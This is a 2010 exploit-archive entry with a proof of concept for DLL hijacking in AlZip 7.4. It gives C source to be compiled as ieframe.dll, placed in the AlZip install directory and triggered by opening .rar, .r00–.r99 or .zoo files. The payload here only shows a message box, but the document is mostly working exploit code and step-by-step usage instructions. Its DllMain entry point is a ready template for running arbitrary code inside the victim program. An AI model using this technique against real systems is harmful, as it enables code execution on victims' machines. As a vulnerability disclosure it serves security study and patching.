AlZip version 7.4 DLL hijacking exploit that leverages ieframe.dll.
f11b489fd05b6163a033a2db6af09cd74af7a298a3fb3ea07b6c7388c2ef88f4
/*
==============================================
AlZip v7.4 DLL Hijacking Exploit (ieframe.dll)
==============================================
$ Program: AlZip
$ Version: 7.4
$ Download: http://www.altools.com/
$ Date: 2010/10/08
Found by Pepelux <pepelux[at]enye-sec.org>
eNYe-Sec - www.enye-sec.org
Tested on: Windows XP SP2 && Windows XP SP3
Extensions: " .rar && .r00 ... .r99 && .zoo "
How to use :
1> Compile this code as ieframe.dll
gcc -shared -o ieframe.dll thiscode.c
2> Move DLL file to the directory where AlZip is installed
3> Open any file in 'Extensions'
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
int m0nk()
{
MessageBox(0, "DLL Hijacking vulnerable", "Pepelux", MB_OK);
return 0;
}
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{m0nk();}